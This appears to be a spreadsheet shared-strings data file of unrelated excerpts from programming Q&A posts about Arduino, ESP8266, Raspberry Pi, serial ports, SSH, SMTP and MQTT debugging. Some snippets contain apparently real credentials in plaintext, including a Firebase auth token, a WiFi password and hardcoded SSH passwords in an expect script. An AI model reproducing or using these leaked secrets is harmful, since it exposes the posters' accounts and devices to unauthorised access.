tls_recv = clientSocket.recv(1024)
print(tls_recv)
if tls_recv[:3] != b'220':
    print('220 reply not received from server')
# Encrypt the socket
#ssl_clientSocket = ssl.wrap_socket(clientSocket, ssl_version=ssl.PROTOCOL_TLSv1)
ssl_clientSocket = ssl.wrap_socket(clientSocket)
print("Secure socket created")
heloCommand = 'EHLO Alice\r\n'
ssl_clientSocket.write(heloCommand.encode())
recv1=''
for index in range(0,recvCount):
  recv1 = recv1+ssl_clientSocket.readline().decode()
print(recv1)
# Send the AUTH LOGIN command and print server response.</t>
  </si>
  <si>
    <t>If the alarm is activated and the contact opens, the alarm sounds (I return true), the alarm will be disconnected if I close the contact again (that is not what I pretend) I want that only disconnect if the alarm deactivation switch is activated.</t>
  </si>
  <si>
    <t>If you are trying to send emails via smtp from google account you have to use googles paraneters for it, and for reciving emails from your host email to gmail well check your spam folder cos without proper registration of your emails domain name in mx record on dns server it will be concidered as spam by google.</t>
  </si>
  <si>
    <t>While your command is setting up a proxy to pass port 443 from one host to port 443 on a different host, the underlying ssh connection still runs on port 22.</t>
  </si>
  <si>
    <t>I want to read the  from CayenneEthernet.h
Original:
Edited:
// DHCP with domain
int* begin(const char* auth,
    const char* domain = BLYNK_DEFAULT_DOMAIN,
    uint16_t port = BLYNK_DEFAULT_PORT,
    const byte mac[] = _blynkEthernetMac)
{   
    ...
    IPAddress myip = Ethernet.localIP();
    BLYNK_LOG("My IP: %d.%d.%d.%d", myip[0], myip[1], myip[2], myip[3]);
    return myip;
}
Arduino code:
#define CAYENNE_DEBUG         // Uncomment to show debug messages
#define CAYENNE_PRINT Serial  // Comment this out to disable prints and save space
#include &lt;CayenneDefines.h&gt;
#include &lt;UIPEthernet.h&gt;
#include &lt;BlynkSimpleUIPEthernet.h&gt;
#include &lt;CayenneEthernetClient.h&gt;
#define VIRTUAL_PIN V1
#define VIRTUAL_PIN V0
...
void setup(){
...
  int *A=Cayenne.begin(token);
...
}
void loop(){
...
}
I am getting this error: 
error: void value not ignored as it ought to be
Question:
How can I return the array correctly?</t>
  </si>
  <si>
    <t>If i boot  using wifi only the green light  will not turn up and i am not sure if the raspberry  is booting or no...but when the ethernet is connected  the gren light  starts blinking  and i can  make an ssh connection.</t>
  </si>
  <si>
    <t>So we would first have to set up the mask bits based on all I2C addresses we want to respond to by OR'ing them and shifting right to match the TWAMR register layout (TWAMR holds mask in bit7:1, bit0 is unused):
The main problem from here on will be to find out which particular I2C address was queried (we only know it was one that matches the address mask).</t>
  </si>
  <si>
    <t>I had scenario where background process will start after user login with credentials and background process has to run 24/7 with out stopping, but limitations on background process quota to 10 mins is stopping my background process.is there any other way that background process has to run continuously with out stopping.</t>
  </si>
  <si>
    <t>i am trying to send data through UART in arduino to fingerprint scanner 
i am using an array to send the commands and it works fine 
the problem is when i'm trying to receive response from the fingerprint 
the fingerprint response is 24 bytes so i tried to receive the bytes and store them in an array of 24 elements 
but when i try to print an element from the received array i get strange symbols</t>
  </si>
  <si>
    <t>To debug it, you can add this in your while loop:
However, a better approach is to use the  event of SerialPort :
int buffersize = 100000;
SerialPort port = new SerialPort("COM3", 9600);
port.DataReceived += port_DataReceived;
// To be safe, set the buffer size as double the size you want to read once
// This is for the case when the system is busy and delays the event processing
port.ReadBufferSize = 2 * buffersize;
// DataReceived event will be fired when in the receive buffer
// are at least ReceivedBytesThreshold bytes
port.ReceivedBytesThreshold = buffersize; 
port.Open();
The event handler:
private void port_DataReceived(object sender, SerialDataReceivedEventArgs e)
{
    // The event will also be fired for EofChar (byte 0x1A), ignore it
    if (e.EventType == SerialData.Eof)
        return;
    // Read the BytesToRead value, 
    // don't assume it's exactly ReceivedBytesThreshold
    byte[] buffer = new byte[port.BytesToRead];
    port.Read(buffer, 0, buffer.Length);
    // ...</t>
  </si>
  <si>
    <t>I had the same problem and was breaking my head for a good time, try this
Run
If the output looks anything like
Then you need to disable getty from trying to send data to that port
In order to use the Raspberry Pis serial port, we need to disable getty (the program that displays login screen) by find this line in file /etc/inittab
T0:23:respawn:/sbin/getty -L ttyAMA0 115200 vt100
And comment it out by adding # in front of it
#T0:23:respawn:/sbin/getty -L ttyAMA0 115200 vt100)
To prevents the Raspberry Pi from sending out data to the serial ports when it boots, go to file /boot/cmdline.txt and find the line and remove it
console=ttyAMA0,115200 kgdboc=ttyAMA0,115200
Reboot the Raspberry Pi
Credit where credit is due: http://blog.oscarliang.net/raspberry-pi-and-arduino-connected-serial-gpio/ helped me figure out how to diable getty</t>
  </si>
  <si>
    <t>I expected the LED to go on while case 0 was valid and to shut off when case 0 shifted to case 1. case valid == output @ case HIGH, case not valid == output @ case LOW.</t>
  </si>
  <si>
    <t>The serial output this produces looks like this:
** Scan Networks ** 
number of available networks:2 
0) SKY0C026   Signal: -48 dBm Encryption: WPA2
1) WAP-HOME   Signal: -84 dBm Encryption: WPA
Status:4
This repeats over and over again as the connection fails (status 4).</t>
  </si>
  <si>
    <t>Serial.print("Loaded ssid: ");
    Serial.println(ConfigSettings.ssid);
    Serial.print("Loaded password: ");
    Serial.println(ConfigSettings.password);
    return true;
}
After I download the code and run ESP8266, the WiFi chip resets with some stack error.</t>
  </si>
  <si>
    <t>19:16:28.120 -&gt; 
19:16:28.120 -&gt; connecting...Refreshing JWT
UPDATE2: JWT validation and credential debug
Below the credential and JWT obtained from Serial Monitor:
18:54:41.890 -&gt; Waiting on time sync...
18:54:42.904 -&gt; Success to open ca file
18:54:42.938 -&gt; loaded
18:54:42.971 -&gt; projects/iot-esp8266-new/locations/us-central1/registries/iotcore-registry/devices/esp8266
18:54:42.971 -&gt; Refreshing JWT
18:54:46.318 -&gt; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
18:54:46.351 -&gt; 
18:54:46.351 -&gt; connecting...Refreshing JWT
The JWT generated has been validated with PyJWT as below:
import jwt
public_key =  open('ec_public.pem').read()
token = 'XXXXXXXXXXXXXXXXXXXXXXXXXXX'
payload = jwt.decode(token, public_key, algorithms=['ES256'], audience="iot-esp8266-new")
payload
{'iat': 1556988880, 'exp': 1556992480, 'aud': 'iot-esp8266-new'}</t>
  </si>
  <si>
    <t>A 172.20.x.x address is a non-routable IP address (see:  https://www.lifewire.com/what-is-a-private-ip-address-2625970) and the DHCP code is (likely) using that address when the address assignment fails.</t>
  </si>
  <si>
    <t>I have already tried the following hacks/mitigation techniques, and many permutations thereof:
sending, then reading twice on the first loop --&gt; the first packet just gets further divided, resulting in the same delayed loop
setting options.c_cc[VMIN] in both blocking and non-blocking mode --&gt; when set to 0, first RX receives 0 bytes, and remaining calls receive 48 --&gt; same steady-state loop as above; when set to 8, same steady-state loop as above; when set to 48, program hangs
increasing the call to delayMicroseconds to several seconds --&gt; no change in behavior
I've also looked at the TX/RX pins using a logic analyzer, and there's more time between the first TX/RX call and the others, but there are no breaks within the 48-byte transmissions themselves, so I'm not sure why the first RX call can only receive up to 8 of the bytes.</t>
  </si>
  <si>
    <t>This is what works for me:
cat copykey.sh:
cat copykey.expect:
#!/usr/bin/expect -f
set timeout 30
spawn ssh user@host mkdir -p .ssh
expect "password:"
send "password\n"
expect "$ "
spawn ~/copykey.sh 
expect "password:"
send "password\n"
expect "$ "</t>
  </si>
  <si>
    <t>I'm using python=3.5 and OpenCV 3.1.4 to establish a connection with my IP camera via RTSP protocol using wifi on Raspberry Pi 3 B
Here's my code
Which raises the error:
From the error it's clear that frames are not being captured from the supplied connection which means connection is not properly established.</t>
  </si>
  <si>
    <t>This is what happens (device = bt module);
LED on device is blinking (~1 sec on, ~1 sec off)
Search for nearby devices (my device module is found)
Click the device to pair
Device asks for pin (I have confirmed the correct pin by AT+PIN)
Phone says "pairing" for roughly 30 seconds
Phone stops attempting to pair, but my serial input from the module says "Connected" and the LED on the module is constantly on
I still have the option to connect to the device, and my phone does not list the device as "paired".</t>
  </si>
  <si>
    <t>And on the raspberry side after each sending you wait for this confirmation and do not send anything until you'll receive an acknowledge from the Arduino.</t>
  </si>
  <si>
    <t>TCPClient.java
MainActivity.java
Photon code: 
SYSTEM_MODE(MANUAL);
TCPServer server = TCPServer(23);
TCPClient client;
void setup() {
      WiFi.on();
      WiFi.setCredentials("AndroidAP", "password");
      WiFi.connect();
      // Make sure your Serial Terminal app is closed before powering your device
      Serial.begin(9600);
      // Now open your Serial Terminal, and hit any key to continue!</t>
  </si>
  <si>
    <t>Kindly try these steps and give it a try:
Turn off firewall on Windows (Java Server)
Check from another network connected pc that you can connect (telnet) to 192.168.1.101 on port 4444 (ie: telnet 192.168.1.101 4444)
Change delay(1000) line to delay(5000) to give arduino ethernet shield more time to initialize
Also please post your loop code.</t>
  </si>
  <si>
    <t>You must reboot the ODROID and it should work
I suggest you to read the answer I linked cause it explains a bit more about how can you substitute the serial port to access the command line (It suggests using ssh) and another thing is that Raspberry PI (And assume ODROID works similar) sends at boot time a message through serial port that will be received by the Arduino.</t>
  </si>
  <si>
    <t>var just for newlines in MS
            $secure = 0;                  // change to 1 if your server is running under SSL
            //connect to the host and port
            $smtpConnect = fsockopen($smtpServer, $port, $errno, $errstr, $timeout);
            $smtpResponse = fgets($smtpConnect, 4096);
            if(empty($smtpConnect)) {
                     $output = "Failed to connect: $smtpResponse";
                     echo $output;
                     return $output;
            }
            else {
                     $logArray['connection'] = "&lt;p&gt;Connected to: $smtpResponse";
                     echo "&lt;p /&gt;connection accepted&lt;br&gt;".$smtpResponse.</t>
  </si>
  <si>
    <t>I'm trying to call the function  in the sketch below, but every time I do so, the sketch seems to stop when reaching the shield() function, I tried to put the function in void loop,void setup,void check password, but always stop all the program.</t>
  </si>
  <si>
    <t>For exemple you want the arduino to connect to SSID:  and Passphrase: abcdefgh1234
So just configure an adhoc wifi on one of your device (even from a smartphone) with this as SSID (or any format you want even some crypted one if you are worried about security): Ard--my_wifi---abcdefgh1234
Configure your arduino to check for SSID starting with Ard--, it will find this one, and get the wanted wifi configuration.</t>
  </si>
  <si>
    <t>The setup method is initializing the serial connection and the sensor pins, further calling the following Wifi initialization method initWifi()to establish a network connection.</t>
  </si>
  <si>
    <t>For example this system can be used with: 
Light switches 
Door sensors 
Doorbells 
Security devices 
Weather sensors like: UV/Rain/Wind Meters 
Temperature Sensors 
Pulse Meters 
Voltage / AD Meters</t>
  </si>
  <si>
    <t>If this connection is attempting to use an L2TP/IPsec tunnel, the security parameters required for IPsec negotiation might not be configured properl'y
If I do a port scan of the Pi port 1723 does not appear to be open.</t>
  </si>
  <si>
    <t>What I have tried:
Check port forwarded ports
tried to add port 8080 to my config in /var/www/html/winsteadworks.com but kept getting errors
Checked my firewall settings for both my router and my raspberry pi
I also tried reconfiguring different files but still have had no luck.</t>
  </si>
  <si>
    <t>HTTP_SERVER_SCRIPTNAME = "Temperatur/PHP/insertTemp.php"
HTTP_SERVER_IP = "144.76.167.69"
HTTP_SERVER_HOSTNAME =    "ribisl.bplaced.net"
Edit 2:
Mysql.lua:
SSID="Josennet"
Password="87E55FA36E"
wifi.setmode(wifi.STATION)
wifi.sta.config(SSID,Password)
HTTP_SERVER_SCRIPTNAME = "Temperatur/PHP/insertTemp.php"
HTTP_SERVER_IP = "144.76.167.69"
HTTP_SERVER_HOSTNAME = "ribisl.bplaced.net"
SERIAL_PRINT = true
function do_get(data1)
    sk=net.createConnection(net.TCP, 0)
    sk:on("receive", function(sck, c)
        if (SERIAL_PRINT) then
            print(c)
        end
    end )
    sk:connect(80, HTTP_SERVER_IP)
    sk:on("connection", function(sck,c)
      -- Wait for connection before sending.</t>
  </si>
  <si>
    <t>My problem is that, upon trying to establish the websocket connection, I get the following error:
WebSocket connection to 'ws://raspberrypi:8080/' failed: Error in
  connection establishment: net::ERR_NAME_NOT_RESOLVED
I believe my error is just due to incorrect URL but I did not find another example of how to solve this error in my research.</t>
  </si>
  <si>
    <t>If you want your esp to find a dedicated server in any private network without requiring DNS and other setup this can be an answer:
On the server side, implement a udp broadcast.</t>
  </si>
  <si>
    <t>debug1: identity file /home/userServer/.ssh/id_rsa type 1
debug1: Checking blacklist file /usr/share/ssh/blacklist.RSA-2048
debug1: Checking blacklist file /etc/ssh/blacklist.RSA-2048
debug1: identity file /home/userServer/.ssh/id_rsa-cert type -1
debug1: Remote protocol version 2.0, remote software version OpenSSH_6.7p1 Raspbian-5
debug1: match: OpenSSH_6.7p1 Raspbian-5 pat OpenSSH*
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: server-&gt;client aes128-ctr hmac-sha1 none
debug1: kex: client-&gt;server aes128-ctr hmac-sha1 none
debug1: sending SSH2_MSG_KEX_ECDH_INIT
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ECDSA 6b:5f:aa:aa:aa0c:aa:33:97:aa:56:aa:39:00:6f:79
debug1: Host '[pibackup.fr]:4444' is known and matches the ECDSA host key.</t>
  </si>
  <si>
    <t>I followed this guide https://wiki.archlinux.org/index.php/SSMTP
I got an error when trying to send an email 
I also got an email from Google telling me a sign-in attempt was prevented because I wasn't using modern security standards: 
Should I be using a different was of sending email or should I use a different email service?</t>
  </si>
  <si>
    <t>As for Connection Refused output, you should check if there is a Firewall and also if you are on the same network... (if you werent connecting to a listenting port on localhost and you were trying to connect to another device).</t>
  </si>
  <si>
    <t>I have downloaded raspbian lite and flashed it to SD card through etcher
As per raspbian's headless ssh tutorial, I created an empty ssh file in /boot
Then I connected ethernet cable from pi into apple airport extreme
when pi is booted, airport utility on macbook shows 10.0.1.9 as a new device on the network
from macbook:
$ ssh -vvv pi@10.0.1.9
OpenSSH_7.8p1, LibreSSL 2.6.2
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 48: Applying options for *
debug2: resolve_canonicalize: hostname 10.0.1.9 is address
debug2: ssh_connect_direct
debug1: Connecting to 10.0.1.9 [10.0.1.9] port 22.
debug1: connect to address 10.0.1.9 port 22: Connection refused
ssh: connect to host 10.0.1.9 port 22: Connection refused
I've done this multiple times, recreating the ssh file at each boot, redownloading and reflashing the raspbian image, it always fails.</t>
  </si>
  <si>
    <t>I have tried it on both a Windows 7 &amp; 8 machine and with 2 different Nano's:
Set my Board to Arduino Nano
Set my Processor to ATmega168
Set my port to COM1
On windows 8 turned off driver signature
Installed the FTDI Driver
Checked my drivers in control panel
USB controllers says USB Serial Converter 
USB Serial port says USB Serial Port (COM1)
Rebooted a Lot!</t>
  </si>
  <si>
    <t>But as far as i can understnd, you want a "PUSH" technology, with means the server send new data to clients when avaiable; that is possible using "WebSocket", but it need a server rewrite to support the protocol, or you can use a library
A websocket can be used like a normal socket (with some security restriction enforced by browser, principally you can only connecf to the same domain/ip of the HTML server), that means that once a connection is established, you can just print and read it like you do with a Serial!</t>
  </si>
  <si>
    <t>Changing the target server checking http://tf.nist.gov/tf-cgi/servers.cgi for availability
Checking for packets sent/received by the Arduino using wireshark (local server) or wireshark + local arp spoofing to route the traffic through wireshark (public server) but in neither case I could detect any packet.</t>
  </si>
  <si>
    <t>I am using Arduino-Make and I am trying to pass in USERNAME and PASSWORD
Command line:
Code:
void setup() {
  Serial.begin(9600);
  String auth_raw2(USERNAME : PASSWORD);
  Serial.println(auth_raw2);
}
void loop() {}
I am getting this error:
macro.ino:10:29: error: found : in nested-name-specifier, expected ::
macro.ino:10:20: error: HELLO has not been declared</t>
  </si>
  <si>
    <t>Once you find "\r\n", you can get the line, and reset the StringBuilder for the next one:
where line is an observable String:
final StringProperty line=new SimpleStringProperty("");
On the Arduino side, if you want to send values from different sensors at different rates, I suggest you define on the Arduino sketch some identification string for each sensor, and you print for each value the id of its sensor.</t>
  </si>
  <si>
    <t>You can, however, use the device's AT API to connect to the internet through a UART and send any arbitrary data, or develop your own firmware to pass data back and forth to a server with the ESP8266 - None of these though would allow a seamless TCP connection like an actual WiFi card would, however.</t>
  </si>
  <si>
    <t>This approach has two problems: 1) the loop doesn't wait until serial data is ready, and 2) the loop doesn't wait until the received GPS data is valid.</t>
  </si>
  <si>
    <t>Thus, you would also need the authentication method:
Just as you would use the library to read the UID
if (mfrc522.PICC_ReadCardSerial()) {
    Serial.print(F("Card UID:"));
    dump_bytes(mfrc522.uid.uidByte, mfrc522.uid.size);
}
you could also access these read/write methods:
MFRC522::StatusCode status;
MFRC522::MIFARE_Key key;
byte buffer[18];
byte size = sizeof(buffer);
for (byte i = 0; i &lt; MFRC522::MF_KEY_SIZE; ++i) {
    key.keyByte[i] = 0xFF;
}
if (mfrc522.PICC_ReadCardSerial()) {
    status = mfrc522.PCD_Authenticate(MFRC522::PICC_CMD_MF_AUTH_KEY_A, 8, &amp;key, &amp;(mfrc522.uid));
    if (status == MFRC522::STATUS_OK) {
        status = mfrc522.MIFARE_Read(8, buffer, &amp;size);
        if (status == MFRC522::STATUS_OK) {
            Serial.print(F("Data (block = 8): "));
            dump_bytes(buffer, 16);
        }
    }
}
Note that I assume block 8 (= sector 2, block 0) to be readbale using key A and that key A is set to the default transport key FF FF FF FF FF FF.</t>
  </si>
  <si>
    <t>32bit unsigned int
un-used  blue     green    red
00000000 00000000 00000000 00000000 
red mask
00000000 00000000 00000000 11111111
green mask
00000000 00000000 11111111 00000000 
blue mask
00000000 11111111 00000000 00000000 
My issue is that the serial communication between the python script and the arduino doesn't appear to be working, and I cannot figure out why.</t>
  </si>
  <si>
    <t>When I send connect message I received connack, and successfully send pingreq and received pingresp, but when I send publish message my connection is broken and I have error:  
mqtt: User not authorized to perform this action.</t>
  </si>
  <si>
    <t>I found:
echo i &gt; COM1 //with i being the number to be sent over
Well i tried that and got a fairly interesting result half the time i would receive this message in the command line:
C:/users/XXXXX&gt; echo 7 &gt; COM3 //im 100% sure im using com3
Access is denied
The other half of the time i would see the data go through (The RX light would light up) but nothing would happen, the light connected to pin 7 wouldn't light up.</t>
  </si>
  <si>
    <t>I am using an 07 MacBook pro)
import serial
import time
import requests
import json
firebase_url = 'https://ourfleet.firebaseio.com'
auth_token = '0sBNZjz4uQvLteDoCZTDUD3RNOT852aKyqahGzl4'
#Connect to Serial Port for communication
ser = serial.Serial('/dev/tty.wchusbserial410', 9600, timeout=0)
#Setup a loop to send GPS values at fixed intervals
#in seconds
fixed_interval = 10
while 1:
    try:
        #GPS value obtained from Arduino + Ublox
        gps_c = ser.readline()
        #current time and date
        time_hhmmss = time.strftime('%H:%M:%S')
        date_mmddyyyy = time.strftime('%d/%m/%Y')
        #current location name
        gps_location = 'ourfleet'
        print gps_c + ',' + time_hhmmss + ',' + date_mmddyyyy + ',' + gps_location
        #insert record
        data = {'date':date_mmddyyyy,'time':time_hhmmss,'location':gps_c}
        result = requests.post(firebase_url + '/' + gps_location + '/gps_c.json'+ auth_token, data=json.dumps(data))
        #insert record
        print 'Record inserted.</t>
  </si>
  <si>
    <t>Assuming that I'm right about the cause of the segfault, the basic procedure in this case would be
To find the line of code that generates the segfault, which probably looks something like POP {r4-r6,pc}
To establish, by taking the stack pointer from r13 and looking at the stack in memory, that the value that's being popped into pc is an invalid branch address
To find the PUSH {r4-r6,lr} that balances this POP, and ascertain that an appropriate address was pushed in the first place
To notice that the stack pointer had changed in value between the end of the PUSH and the start of the balancing POP (which it should not do if all intermediate stack operations have been properly balanced)
To step through the code and try to find the source of the stack imbalance.</t>
  </si>
  <si>
    <t>");
  } else {
    Serial.println("Did not find fingerprint sensor :(");
    while (1){
      delay(1);
    }
  }
  again:
  Serial.println("Initialization SD card");
  if (!</t>
  </si>
  <si>
    <t>Straight afterwards, I am able to initiate a TCP connection on port 16000, although the first TCP attempt always results in a RST,ACK being returned - so a second attempt needs to be made.</t>
  </si>
  <si>
    <t>Only enter AT Command through serial
  port after SIM908 is powered on and Unsolicited Result Code "RDY" is
  received from serial port.</t>
  </si>
  <si>
    <t>(the main problem with it is that serial ports are an anonymous port that doesn't have a unique DeviceID...leading to confusion if more than one serial port is connect to your system.)</t>
  </si>
  <si>
    <t>Base station code:
Robot node: (spammer is identical, except it sends replyPacket 10 times in a loop)
#include &lt;ESP8266WiFi.h&gt;
#include &lt;WiFiUdp.h&gt;
const char* ssid = "mywifi";
const char* password = "password";
IPAddress base_multicast(239, 255, 0, 34);
IPAddress robot_multicast(239, 255, 0, 35);
WiFiUDP Udp;
unsigned int port = 8080;  // local port to listen on
char incomingPacket[255];  // buffer for incoming packets
char  replyPacket[] = "Hi there!</t>
  </si>
  <si>
    <t>I'm working to write a ctypes wrapper in PySodium for a libsodium routine , the routine is defined as:
My test driver is:
from pysodium import  crypto_aead_chacha20poly1305_encrypt
from bitstring import BitStream
key = BitStream(hex="4290bcb154173531f314af57f3be3b5006da371ece272afa1b5dbdd1100a1007")
nonce = BitStream(hex="cd7cf67be39c794a")
ad = BitStream(hex="87e229d4500845a079c0")
msg = BitStream(hex="86d09974840bded2a5ca")
print(key)
print(nonce)
print(ad)
print(msg)
m = crypto_aead_chacha20poly1305_encrypt(message=msg.bytes,
                                         ad=ad.bytes,
                                         nonce=nonce.bytes,
                                         key=key.bytes)
edata = BitStream(bytes=m)
print(edata)
and much to my surprise (being the first time I used libsodium or PySodium or ctypes) it worked without a hitch on an AMD x86_64 system.</t>
  </si>
  <si>
    <t>I would like to know
if Telnet offers capability to read/write to the serial port directly
This is because I would use the Rasberry Pi as Telnet server to interface with the southco EA-A06 http://www.southco.com/en/ea-a6 where various locks is connected to the controller and where using telnet I would like to be able to send commands to open/close the locks over the server.</t>
  </si>
  <si>
    <t>I followed a tutorial to illuminate an LED on a Raspberry Pi so that when an iBeacon detected an LED is turned on using the GPIO pins but I need to alter the script so that the LED goes off again when the iBeacon is no longer detected.</t>
  </si>
  <si>
    <t>Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds
It is my understanding that there is no firewall so I am baffled as to why I can't see the server from my development machine.</t>
  </si>
  <si>
    <t>For the webconfig part of my sketch the device attempts to get online and if it fails it scans for available wifi networks, goes into Access Point Mode, starts a server, sends the list of ssid's and listens for a response of an ssid/passwd pair.</t>
  </si>
  <si>
    <t>&gt; raspi-gmail.py
#!/usr/bin/env python
import RPi.GPIO as GPIO, feedparser, time
DEBUG = 1
USERNAME = "***EMAIL***"
PASSWORD = "************"
NEWMAIL_OFFSET = 1          #unread offset global
MAIL_CHECK_FREQ = 60    #Checks mail every 30 seconds
GPIO.setmode(GPIO.BCM)
YELLOW_LED = 18
RED_LED = 23
GPIO.setup(YELLOW_LED, GPIO.OUT)
GPIO.setup(RED_LED, GPIO.OUT)
while True:
    newmails = int(feedparser.parse("https://" + USERNAME + ":" + PASSWORD + "@mail.google.com/gmail/feed/atom")["feed"]["fullcount"])
    if DEBUG:
        print "You've got mail!</t>
  </si>
  <si>
    <t>So, here are my error codes:
When I try installing librosa I always get:
with virtualenv:
error:
Command "/home/pi/flaskenv/bin/python -u - c "import setuptools, tokenize;__file__='/tmp/pip-install-iYvjRD/scipy/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-7L25tV/install-record.txt --single-version-externally-managed --compile --install-headers /home/pi/flaskenv/include/site/python2.7/scipy" failed with error code 1 in /tmp/pip-install-iYvjRD/scipy/
--&gt; full error code:
https://docs.google.com/document/d/1dHq0S227vld4iJ7H2SgaDJ2jlD95bZUKqkUH4VhrS2U/edit?usp=sharing
without virtualenv:
sudo pip install librosa
Failed building wheel for scipy
Failed cleaning build dir for scipy
Failed building wheel for llvmlite
error:
`Command "/usr/bin/python -u -c "import setuptools, tokenize;file='/tmp/pip-build-AUlqg0/scipy/setup.py';f=getattr(tokenize, 'open', open)(file);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, file, 'exec'))" install --record /tmp/pip-44B19L-record/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-build-AUlqg0/scipy/
`
--&gt; full error code: 
https://docs.google.com/document/d/1pPs6JEqeJ2uS1xWCg8d_dqsbJ6Tgh2EO-eB5aUOYU7I/edit?usp=sharing
installing with conda fails always because of audioread --&gt; audioread is not found
So right now, I am thinking that maybe I should install numpy and scipy manually before librosa, than using this lines to get the right versions of llvmlite and numba
udo apt install libblas-dev llvm python3-pip python3-scipy
pip install llvmlite==0.15.0
pip install numba==0.30.1
and then trying to install librosa?</t>
  </si>
  <si>
    <t>(My reason for doing this is for the program to act as an install manager of sorts where it asks the user to enter their email address and password and then it writes it in to the correct part of ssmtp.conf)
After writing to the file I close:
file.close()
With that being completed, I should be ready to send an email.</t>
  </si>
  <si>
    <t>#pword = base64.b64encode((password).encode())
print(str(pword))
ssl_clientSocket.write(pword)
ssl_clientSocket.write('\r\n'.encode())
pword_recv = ssl_clientSocket.readline()
print(pword_recv)
if pword_recv[:3] != b'235':
    print('235 reply not received from server')
# Send MAIL FROM command and print server response.</t>
  </si>
  <si>
    <t>It has established a TCP connection, but the server has not responded to the MQTT connection attempt.</t>
  </si>
  <si>
    <t>During authentication:
Random B is received from the card with RECEIVE + DECIPHER
Random AB is sent to the card with SEND + ENCIPHER
Random A is received with RECEIVE + DECIPHER
The CMAC is a copy of the IV of the session key.</t>
  </si>
  <si>
    <t>So
Edit the bind address in the conf file to "0.0.0.0",
Create a user and give all privileges via SQL,
Edit the host.allow file to include "All : 127.0.0.1" for local hosts,
Edit the host.allow file to include "All : (External IP)" for connection from (External IP),
Edit the Key used to be an open SSH key, only the private key needs converting.</t>
  </si>
  <si>
    <t>Even if the firewall allows an incoming connection on a given port, "port forwarding" or other custom configurations are needed for unexpected messages to reach one of the multiple devices on the network (the devices usually share the same public IP address of the network and external systems' messages cannot reach the right local address without forwarding by the router).</t>
  </si>
  <si>
    <t>iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
For any packets coming, tracked as ESTABLISHED or RELATED, the filter lets it pass
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
For the NAT table (which contains the FORWARD chain), in the POSROUTING chain, any packet leaving eth0 forgets its inner IP address (so, stays behind a NAT), and gets the one of eth0: MASQUERADE stands for masking the address.</t>
  </si>
  <si>
    <t>Ensure to uncomment only one line within the next block, having the exact same serial port included as above when successfully testing the serial connection (in this example again the Pi3 port)
/dev/serial0
Now add the following section at the end of the file for fona-file authentication:
#Authentication
user abcd@efgh.dom &lt;&lt; here goes the providers APN user name
password 1a2b3d4e &lt;&lt; here goes the providers APN password 
Save and exit the file and exit the superuser mode
[Ctrl]+[x], [Y], [Enter]
exit [Enter]
At least give it a try, as stated at Adafruit
sudo pon fona
If the red LED starts blinking twice every second you're done!</t>
  </si>
  <si>
    <t>Get your device to send us some valid data - we'll visualize it for
  you
Some initial connection failures
but the last attempt passes and /var/log/system says:
Jun 28 21:14:55 rasppi2 iot[2029]: Connecting to
  ssl://XXXXX.messaging.internetofthings.ibmcloud.com:8883 with client
  Id: d:XXXXX:RaspberryPi2:
  Jun 28 21:14:55 rasppi2 ntpd_intres[2135]: DNS 0.debian.pool.ntp.org -&gt; 217.79.179.106
  Jun 28 21:14:55 rasppi2 ntpd_intres[2135]: DNS 1.debian.pool.ntp.org -&gt;
  178.33.227.201
  Jun 28 21:14:55 rasppi2 ntpd_intres[2135]: DNS 2.debian.pool.ntp.org -&gt; 193.225.118.162
  Jun 28 21:14:55 rasppi2 ntpd_intres[2135]: DNS 3.debian.pool.ntp.org -&gt; 148.251.6.51
  Jun 28 21:14:55 rasppi2 iot[2029]: Connection was successful
  Jun 28 21:14:58 rasppi2 iot[2029]: Subscription succeeded
Is there anything else I should check?</t>
  </si>
  <si>
    <t>so prior to running the program I get the necessary installs:
After installing those three things the next step in sending emails is to edit the file /etc/ssmtp/ssmtp.conf and add your email address and password along with some other pieces of information:
root=postmaster
hostname=raspberrypi
AuthUser=emailaddress@gmail.com
AuthPass=password
FromLineOverride=YES
mailhub=smtp.gmail.com:587
UseSTARTTLS=YES
And this is where the complications start.</t>
  </si>
  <si>
    <t>Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.
       ]</t>
  </si>
  <si>
    <t>Code for image conversion:
And the code for drawing the image:
I checked the serial monitor on the Arduino IDE and it appears that the ESP get at least something from the server:
Basecamp V.0.1.6
MAC-Address: xxxxx, Hardware MAC: xxxxx
*******************************************
* ACCESS POINT PASSWORD: :xxxxx
*******************************************
Wait till the client is connected
Not going to deep sleep.</t>
  </si>
  <si>
    <t>To be sure about your connections, don't hesitate to double check the PCB and the schematic:
http://www.libelium.com/squidbee/index.php?title=See_Schematics
Also, to be able to use that shield without any hack, you'd better use an Arduino Leonardo which features an ATmega32U4 that has two distinct serial ports: one for USB, another for pins 1/0.</t>
  </si>
  <si>
    <t>PS&gt; I understand that the example I'm pointing to is for a simple TCP socket connection, but SSH begins with a simple TCP connection, and that is what is failing.</t>
  </si>
  <si>
    <t>As far as I know the only way to detect a comm port in VB6 is to attempt to open the port and if that fails, move on to the next possible port number.</t>
  </si>
  <si>
    <t>This is what my file looks like:
# Database administrative login by Unix domain socket
local   all             postgres                                peer
# TYPE  DATABASE        USER            ADDRESS                 METHOD
# "local" is for Unix domain socket connections only
local   all             all                                     peer
# IPv4 local connections:
host    all             all             127.0.0.1/32            md5
# IPv6 local connections:
host    all             all             ::1/128                 md5
# Allow replication connections from localhost, by a user with the
# replication privilege.</t>
  </si>
  <si>
    <t>The Pin in question is on GPIO0 (IRQ 49) so I attempt to configure the FIQ as follows:
I then find that the FIQ register has an invalid entry of 0x54 so I force the FIQ register:
I have written the FIQ as follows:
#define DATA_ACK_OFFSET     12
ENTRY(pulse_logger_fiq_handler)
